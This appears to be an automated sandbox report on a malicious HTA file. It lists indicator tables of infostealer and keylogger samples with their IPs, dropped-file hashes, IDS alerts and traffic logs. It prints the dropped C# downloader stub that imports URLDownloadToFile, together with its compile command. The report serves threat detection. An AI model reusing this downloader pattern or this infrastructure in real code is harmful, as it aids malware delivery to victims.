CLOUDFLARENETUS | remittance detail_03.12.2025_RECIPIENT_DOMAIN_NAME}00990__098.html | malicious | Unknown | 104.21.17.6
CLOUDFLARENETUS | SpaceCheatFort.exe | malicious | LummaC Stealer | 188.114.97.3
CLOUDFLARENETUS | Setup.exe | malicious | LummaC Stealer | 188.114.97.3
AS-COLOCROSSINGUS | signed contract 01.xls | malicious | Unknown | 198.12.89.24
AS-COLOCROSSINGUS | PAYMENT ADVICE.xls | malicious | Unknown | 172.245.123.28
AS-COLOCROSSINGUS | Inquiry.xla.xlsx | malicious | Unknown | 172.245.123.24
AS-COLOCROSSINGUS | Document.xls | malicious | Unknown | 107.174.231.211
AS-COLOCROSSINGUS | HAWKE ORDER 12.3.2025.pdf (~135 KB).xls | malicious | Unknown | 104.168.7.38
AS-COLOCROSSINGUS | signed contract 01.xls | malicious | Unknown | 198.12.89.24
AS-COLOCROSSINGUS | Inquiry.xla.xlsx | malicious | Unknown | 104.168.7.38
AS-COLOCROSSINGUS | PAYMENT ADVICE.xls | malicious | Unknown | 172.245.123.28
AS-COLOCROSSINGUS | Inquiry.xla.xlsx | malicious | Unknown | 172.245.123.24
AS-COLOCROSSINGUS | HAWKE ORDER 12.3.2025.pdf (~135 KB).xls | malicious | Unknown | 104.168.7.38
ORACLE-BMC-31898US | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | QUOTATION_FEBQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 193.122.6.168
ORACLE-BMC-31898US | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Way bill & Invoice.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | cbr.m68k.elf | malicious | Mirai | 144.25.156.103
ORACLE-BMC-31898US | file.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | http://account.hrblock.com | malicious | Unknown | 130.61.120.2
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | PENDING PAYMENT FOR March SOA.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | Way bill & Invoice.exe | malicious | Snake Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | 1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):962048
                                                                                    Entropy (8bit):6.8404672126338975
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Eu6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYga9TRmJTT:Eu6J33O0c+JY5UZ+XC0kGso6Fa5tCWY
                                                                                    MD5:724A10F0D502447504BD44AD72AA462F
                                                                                    SHA1:967CE5451BC887068A8ABFBA6CCBEDA97E452DEA
                                                                                    SHA-256:AFC0FAE5423AFEAB434D2F262D8C658D2F316C50986BFE2777E09B90D50A1971
                                                                                    SHA-512:D76FEC804B7D1BDEC53F533AB46B3A1A958F8962D98AF8A869366615429F46767558B3A7E5228A8A909FF6F682EEC42144F68A41F96108DF70A4692E311E074B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...OP.g.........."..................}............@.......................... ......@.....@...@.......@.....................L...|....p...%.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....%...p...&..................@..@.reloc...q.......r...<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1328
                                                                                    Entropy (8bit):5.401282491603541
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3KIWSKco4KmM6GjKbmOIKo+mZ9tYs4RPQoUEJ0gt/NK3R8UHrgtq:pWSU4Yymp+mZ9tz4RIoUl8NWR8WP
                                                                                    MD5:22126327B16A6B21F6183FC5D7C4BC40
                                                                                    SHA1:0794FA6ECCC3372BEA622B2B471D4EECD34FC302
                                                                                    SHA-256:0946CD8DD4C15F347CBAB1B1202B9F4FCABEE49B3A1C76A64C9FF2BF40FA4E72
                                                                                    SHA-512:4FCA7DEE99ADA06663464F0DC0647712B1D5AB714566E6C5FDF74BEE344FA53EAE4C10185D0A5C951001612699192368B44E9DA08B963E88CD11F768CE367191
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Thu Mar 13 01:24:09 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1340
                                                                                    Entropy (8bit):3.982321318079384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HtK9oca+Mh5aH4wKcjmfwI+ycuZhNnWakSEHPNnqSed:pZ5ynK2mo1ulWa3CqS+
                                                                                    MD5:615497C577EEE858B703F41E08890D45
                                                                                    SHA1:CB1D41E00A4920A7A9F0196A180B1583264AD50C
                                                                                    SHA-256:309A116B8EEC01BC5A777C9AA56BE4B08E38FE245F1AFFE8E5955CF4B21B98F6
                                                                                    SHA-512:5DAE38C727C66AB57174D4C78A25565904D21C7D3B65F531D71F375CAEA47C22DF077E1B8902B7DB5C4870DF9D1977EC235C24D062C2EA2166F4691A2CDEF530
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:L....3.g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP..................Gn.`.erD..J...x..........7.......C:\Users\user\AppData\Local\Temp\RESC24D.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):60794
                                                                                    Entropy (8bit):7.901896315298872
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:v/w2nM/a4pct9zNDc8tu21JBypiIF9JVV0yzD3RAte6:v/w2nAON1HkpkcTete6
                                                                                    MD5:D43BC7160BC6DA54AFE896EADC54DAB6
                                                                                    SHA1:505C09B9B514510A6CAD97ABEA14440F1FEF21E2
                                                                                    SHA-256:D69D48C1555C80E1D949563F0687B70B3ED4EE03EC347A822B916DF85C664140
                                                                                    SHA-512:480F007943129F047A24E2AE6E52D0C142446B887AA907ECF22D73F74E79044ADE4EE6819CD63E724A3809D67E8923DB8CAB5702F6329C3373145A215A0EB951
                                                                                    Malicious:false
                                                                                    Preview:EA06..n.....:uNgS..fSM..gM...s.......j`.y....}0..o-.R..z&z%.]..X...>...5j...(.T%......Tl.J4..Z..o..=.W\.....,.....s2.Q(.<.....X..gQ.L.vJ-..L...`.....S:.d.,.....Ns...(.:m\.?4...u(.i.<./.j,.mM...s.H..#.......7l`..br...]X.....*s...../.]..Z..X.....(.]..,.U....N.8.M(.....gS....y...X......aK.!+....F..o...V.Q.Qi@..Np...r.....y.......8...`..Fs<.R1ti.g.3......q..T.8....uO.R...,.....b.Q.U............,.........,W...!...BK@.J..a?.,+..........p..p.XKj1.4.iO.Ei....s9.M-.....3..@D...#M..zs...a6....Bs9.Q.4i...7..g.....9.....iF.I@R.EZ...Q..:4.9.F"TZ$n...Nbq@..L.B..s).....F`..$.iC.\@..<........l.#q.Qi..|.@..Ff..%6.S...S..ZwS.!#.8.n."...j.f.G..R.......i{...m0.L.u9.G*..F.9.Vs..M't..rc<..fS....M...s...9...c>....4....l....N....6.A..SoH.....?Ko..,..~s...F..ow..*.......im...Y....nQm..mNkS...B..N.1....J-.a0......&.F..o6Z....y#r..R?;...R.m..0...1.........@.'[,..e..DD...`.'sS.....-.cO.S..2..w...).`...;..js{..M9....K....,G2.7.......bUM..m@.d..{...3=...7..fu........s..........u.. ..
                                                                                    Process:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):93696
                                                                                    Entropy (8bit):6.663634817949847
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:/Zu5NbhBFNzGG6lte40mKT6WfRKHWWxaxVWr7pUITXQq:/QWHlIfUaQ2WxaxVWr7pUIjQq
                                                                                    MD5:A6E50B8443D10E4BA1213CBB3D521966
                                                                                    SHA1:3F23471199D78BC01C8700F0A77771F9885D2F7C
                                                                                    SHA-256:B01FAA6339DDEA2C05F21BB96B668C90A8D3A5579EE4900622D8474E9F44C097
                                                                                    SHA-512:DFBA52A4FB61CAA7DF907DB30260EC6F5A6F24444F9A27899D0D56AB860F3F1EE614BE57CFEED96E9CFB0DBFCA03181C867FF485FF6E6DF5922E549D52148F7F
                                                                                    Malicious:false
                                                                                    Preview:y..3NS3S=924..3M.3S9924E.3MS3S9924EF3MS3S9924EF3MS3S9924EF3M.3S97-.KF.D...8u....Z>sC!V^@U(fP,=]<M.PQe4F#sZ=.}}ge+\)6.^43.4EF3MS3.|92xDE3.={.9924EF3M.3Q823dEFWLS3[9924EF..R3S.924.G3MSsS9.24ED3MW3S9924E@3MS3S992.DF3OS3S9926E&.MS#S9)24EF#MS#S9924EV3MS3S9924EFc.R3.9924.G3.V3S9924EF3MS3S9924EF.LS?S9924EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3mS3[9924EF3MS3S1.24.F3MS3S9924EhG(+GS99.VDF3mS3S]824GF3MS3S9924EF3Ms3SY.@G7%3MS.V992.DF3KS3S_824EF3MS3S9924.F3.}A6UVQ4EJ3MS3.8926EF3!R3S9924EF3MS3Sy92vEF3MS3S9924EF3MS..8924EF{MS3Q9<2H.F3..3S:924.F3K..S9.24EF3MS3S9924EF3MS3S9924EF3MS3S9924EF3MS3S9.O.J..:@..924EF3LQ0W?1:4EF3MS3SG924.F3M.3S9.24Ec3MS^S99.4EFMMS3-992PEF3?S3SX924.F3M<3S9W24E83MS-Q.&24Ol.MQ.s9984o.@lS3Y.824A5.MS9.;9206e3MY.P996GaF3G.7S9=A.EF9.V3S=.h4F.%KS3HV.24OF0.F5S9"..ED.tS3Y9..4F.&KS3H..26.O3MW..J$24CnqMS9'0926.L3MW.M;.q4EL.o- S9=.4odMYS3W.9..;S3MW.S..L"EF7fS.qG.24Am3gU.19K.8E60"23S?..4EL..S3U9..4;H3MW1<.92>cl.M{cS9?2..F3KS..9G.4EB.J-.S9=.";w3MW.UA9226.3MY...920m.3MY3y.9.mEF5M{.S9?
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.099778539615212
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Wak7YnqqEHPN5Dlq5J:+RI+ycuZhNnWakSEHPNnqX
                                                                                    MD5:CE476EE1607F65724496FD4ADF0FF878
                                                                                    SHA1:7813137C4EB25EA9DA7873A570829E51CA20C2DE
                                                                                    SHA-256:42679FCED8E5E5F7044DE299193F77BE8400EEB022CF29FCCA578D6746AA1097
                                                                                    SHA-512:A1FC06808A86295F9DC79D7AA5B6040294C8C7D7E3EEB36E787FAB8A27EB043A7FC604EE19767628D6415172FCC99AA22BA58BC661DF21EAF095B1D642949E52
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.b.m.n.g.f.j.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (350)
                                                                                    Category:dropped
                                                                                    Size (bytes):467
                                                                                    Entropy (8bit):3.609505187971277
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:V/DsYLDS81zu6Tlim/dHMGl/JjQXReKJ8SRHy4HFQmIh4sNgT3Ky:V/DTLDfu6TYIdFuXfHSTsKy
                                                                                    MD5:8E152222B8DDBD0A2979CB23ACB1742F
                                                                                    SHA1:AB57F25DDE03B79E9079219A4C08EAF3BC22FB0D
                                                                                    SHA-256:A86D009A189A71E1F11D4E9D37F02FEB9661F0F887049092F9CB48025A8B6187
                                                                                    SHA-512:443D306E57BD14963B106B2FD187FE6E5BF763078B8B79EA473630D25A384B293E351DC92C2477C49CB5A48956564EA5CDECDEDBA105912018AD086B4151F8E1
                                                                                    Malicious:false
Preview (line breaks and indentation restored; the file is the C# source PowerShell's Add-Type hands to csc.exe):
using System;
using System.Runtime.InteropServices;

namespace edv
{
    public class HuwJrMudHL
    {
        [DllImport("urLmon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr G,string JwFF,string Dyp,uint X,IntPtr zJ);
    }
}
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):375
                                                                                    Entropy (8bit):5.241916829405215
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fGLzzxs7+AEszIN723fGLNAn:p37Lvkmb6K2asWZETaJ
                                                                                    MD5:EDBEDC60243B7204731F06C4A7AD2148
                                                                                    SHA1:3C37CBB851AA2926EF455ADA228A0C3E835D4DD0
                                                                                    SHA-256:B7DE84E05980400F6021523CF18AFF9AF6A68286EDFBAA0159D6DC40788A364F
                                                                                    SHA-512:147B173A7C6B2C4C9ABD17A1FB4250F36FF72F976C263F275B87492FBC19CCCC98F293E2FA646DB085B3407FF6C1FFE012A8728EBE66825AFCD0322A2DF689C4
                                                                                    Malicious:true
Preview (leading byte-order mark dropped):/t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.0.cs"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3072
                                                                                    Entropy (8bit):2.788745281749708
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:etGSjJOJK3lz8shgkhb4q8YtkZfoJryWWI+ycuZhNnWakSEHPNnqI:60Y3uc4fPJoJryd1ulWa3CqI
                                                                                    MD5:8060EEEE88668F90FDC7201FD3C8D51A
                                                                                    SHA1:E2CBF31B6475B7E754C211274754F5EFD54BD92B
                                                                                    SHA-256:93C8CFDBC9F0F7444AC615AFC9D9EB2A55037CE5B66FDB86B9160E53CC715F1A
                                                                                    SHA-512:D6D383EDF8F68AEC4431D8425D148445BF17CDFA96E9314CEA6F5D7D491FA35F0745AAED889BCD78045A754071B9B70D5E2F32D390E5CFA15CBF88419FFC52FC
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.g...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....e.....e...........................".............. =.....P ......O.........U.....W.....\.....`.....b...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.hb
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):876
                                                                                    Entropy (8bit):5.299236204753517
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:KOuqd3ka6K2adETaMKax5DqBVKVrdFAMBJTH:yika6CdE+MK2DcVKdBJj
                                                                                    MD5:B687F9C65A4E5A56EB20357E6CF34E8C
                                                                                    SHA1:21C0EF8EB9418088AC5309282A412609FE0FD67A
                                                                                    SHA-256:092E5C8AED1ADC798386B5E9319FC470F33F690955AE23E297B63B04A24F90B0
                                                                                    SHA-512:F02C83402C9F87BAA90BA7909ED962807E260F435717188E07093065D99A7AED77DCC92E15164ACF960CB89286D12EDEB2C4471917F85CDBD921F3ADA3B0FD4D
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):962048
                                                                                    Entropy (8bit):6.8404672126338975
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Eu6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYga9TRmJTT:Eu6J33O0c+JY5UZ+XC0kGso6Fa5tCWY
                                                                                    MD5:724A10F0D502447504BD44AD72AA462F
                                                                                    SHA1:967CE5451BC887068A8ABFBA6CCBEDA97E452DEA
                                                                                    SHA-256:AFC0FAE5423AFEAB434D2F262D8C658D2F316C50986BFE2777E09B90D50A1971
                                                                                    SHA-512:D76FEC804B7D1BDEC53F533AB46B3A1A958F8962D98AF8A869366615429F46767558B3A7E5228A8A909FF6F682EEC42144F68A41F96108DF70A4692E311E074B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...OP.g.........."..................}............@.......................... ......@.....@...@.......@.....................L...|....p...%.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....%...p...&..................@..@.reloc...q.......r...<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                    File type:HTML document, ASCII text, with very long lines (14696), with CRLF line terminators
                                                                                    Entropy (8bit):2.297491245253929
                                                                                    TrID:
                                                                                    • HyperText Markup Language (15015/1) 100.00%
                                                                                    File name:uhg.hta
                                                                                    File size:14'864 bytes
                                                                                    MD5:179a3830db0768b766cc9375a3cf9a4c
                                                                                    SHA1:eb5290b3b563ad540db805c77b67bf49d394308e
                                                                                    SHA256:735354ae6e387cd7d7b63f2bc45f838f1218f956e278e20401b8ad606dec8488
                                                                                    SHA512:7755b6556d950a9812accbed4f643b21d77dbf631a6275e9ee01cb289290f66b28629da5067c1152e6809b6df4ec27fb079a0156db77bb1fb1466db9d50dfb5b
                                                                                    SSDEEP:96:/AbxYbDbgXYb62O5CTfSyerb2wb2EeYbEbd+:OYEXY+2OATbweYP
                                                                                    TLSH:306275240C0FBD26172791148DCF69E848DFE799A4707AEA746C8590A379BF854C0FD6
                                                                                    File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<scRipT lAngUAGe="vbScriPt">..diM
Timestamp                        SID      Signature                                                             Severity  Source IP     Source Port  Dest IP         Dest Port  Protocol
2025-03-13T01:18:55.126197+0100  2022050  ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1  1         23.95.235.28  80           192.168.2.6     49694      TCP
2025-03-13T01:18:55.217462+0100  2022051  ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2  1         23.95.235.28  80           192.168.2.6     49694      TCP
2025-03-13T01:19:03.185771+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                     2         192.168.2.6   49695        158.101.44.242  80         TCP
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Mar 13, 2025 01:18:54.645906925 CET  49694        80         192.168.2.6   23.95.235.28
Mar 13, 2025 01:18:54.650656939 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:54.650748968 CET  49694        80         192.168.2.6   23.95.235.28
Mar 13, 2025 01:18:54.650934935 CET  49694        80         192.168.2.6   23.95.235.28
Mar 13, 2025 01:18:54.655591965 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:55.125833035 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:55.125849962 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:55.125858068 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:55.125926971 CET  80           49694      23.95.235.28  192.168.2.6
Mar 13, 2025 01:18:55.125933886 CET  80           49694      23.95.235.28  192.168.2.6
